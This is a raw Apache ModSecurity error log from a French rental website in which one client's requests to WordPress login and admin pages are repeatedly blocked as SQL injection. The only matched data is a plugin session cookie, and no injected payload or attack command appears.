[Mon May 11 18:31:39.237442 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEag-Qm4vhlWBPlMjl-wAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:39.472427 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEaw-Qm4vhlWBPlMjl_QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:39.472716 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEaw-Qm4vhlWBPlMjl_QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.029734 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEaw-Qm4vhlWBPlMjl_QAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.122847 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEbA-Qm4vhlWBPlMjl_gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.123114 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEbA-Qm4vhlWBPlMjl_gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.679656 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEbA-Qm4vhlWBPlMjl_gAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.813035 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEbA-Qm4vhlWBPlMjmAAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:40.813335 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEbA-Qm4vhlWBPlMjmAAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:41.224724 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEbA-Qm4vhlWBPlMjmAAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:41.497659 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEbQ-Qm4vhlWBPlMjmAQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:41.497950 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEbQ-Qm4vhlWBPlMjmAQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:42.093494 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEbQ-Qm4vhlWBPlMjmAQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:43.060178 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmAwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:43.060462 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmAwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:43.701570 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmAwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:43.986335 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmBQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:43.986609 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmBQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:44.612296 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEbw-Qm4vhlWBPlMjmBQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:45.106480 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmBgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:45.106749 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmBgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:45.673805 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmBgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:45.844968 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmCQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:45.845275 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmCQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:46.400948 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEcQ-Qm4vhlWBPlMjmCQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:46.499512 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEcg-Qm4vhlWBPlMjmCgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:46.499793 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEcg-Qm4vhlWBPlMjmCgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:46.871212 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEcg-Qm4vhlWBPlMjmCgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:47.257698 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEcw-Qm4vhlWBPlMjmDAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:47.257997 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEcw-Qm4vhlWBPlMjmDAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:47.877975 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEcw-Qm4vhlWBPlMjmDAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:48.111173 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEdA-Qm4vhlWBPlMjmDQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:48.111473 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEdA-Qm4vhlWBPlMjmDQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:48.734616 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEdA-Qm4vhlWBPlMjmDQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:49.077248 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEdQ-Qm4vhlWBPlMjmDgAAAAM"], referer: https://rentparadise.fr/wp-login.php
